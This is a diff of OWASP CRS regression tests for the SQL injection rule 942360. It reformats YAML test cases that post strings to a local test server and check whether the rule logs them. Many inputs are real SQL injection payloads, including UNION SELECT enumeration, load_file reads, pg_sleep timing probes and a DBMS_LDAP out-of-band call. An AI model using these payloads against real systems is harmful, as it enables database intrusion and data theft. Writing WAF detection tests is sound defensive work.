Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: 
- - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-6 + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 8 desc: "Detects concatenated basic SQL injection and 
SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 
942360-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 13 desc: "Detects 
concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 14 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 15 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 16 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 17 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Delete (Trashcan)" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Delete (Trashcan)" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 18 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "5desc" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "5desc" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 19 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "34-delete" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "34-delete" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 20 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " update" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test 
agent" + method: POST + port: 80 + uri: "/post" + data: " update" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 21 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "/select-quote" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "/select-quote" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 22 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Update: After..." - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Update: After..." 
+ version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 23 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "\"desc\"" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "\"desc\"" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 24 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/load.php" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/load.php" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 25 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/update-assets" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-26 + - input: + 
dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/update-assets" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 26 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "bla blabla live update chart" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-27 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "bla blabla live update chart" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 27 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ".select-gws-banana" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-28 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ".select-gws-banana" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 28 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "blablabla. As evidence from the following blablabla" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-29 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "blablabla. As evidence from the following blablabla" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 29 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-30 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 30 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "'||(select(pg_sleep(15))where(true))||'/investigate" - 
version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "'||(select(pg_sleep(15))where(true))||'/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 31 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_id: 32 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2020-03-01 UNION ALL SELECT CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-33 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP 
CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2020-03-01 UNION ALL SELECT CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 33 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "x\"; SELECT LOAD_FILE('" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-34 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "x\"; SELECT LOAD_FILE('" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 34 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "-1 UNION SELECT null,123456,null,null,null,null--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-35 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "-1 UNION SELECT null,123456,null,null,null,null--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 35 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP 
CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-36 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 36 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-37 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 37 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" - version: HTTP/1.0 - output: - 
log_contains: id "942360" - - test_title: 942360-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 38 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 39 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 